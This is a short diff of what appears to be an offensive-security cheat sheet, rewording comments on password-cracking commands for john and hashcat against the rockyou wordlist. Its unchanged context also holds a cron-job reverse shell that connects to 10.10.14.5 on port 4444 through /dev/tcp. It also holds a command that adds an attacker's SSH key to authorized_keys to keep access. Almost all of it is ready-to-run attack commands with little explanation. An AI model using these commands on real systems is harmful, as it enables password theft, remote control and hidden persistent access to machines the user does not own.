 john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

-hashid '$6$salt$hash...' # $6$ = sha512crypt, mode 1800
+hashid '$6$salt$hash...' # $6$ = sha512crypt

-hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
+hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt # sha512crypt

-hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt # $1$ md5crypt
+hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt # md5crypt ($1$)

-hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt # $2b$ bcrypt
+hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt # bcrypt ($2b$)

-# Linux — cron job backdoor
+# Linux — add a cron job reverse shell

 echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" >> /etc/crontab

-# Linux — SSH key persistence
+# Linux — add your SSH public key for persistent access

 mkdir ~/.ssh && echo "ssh-rsa AAAA...yourkey..." >> ~/.ssh/authorized_keys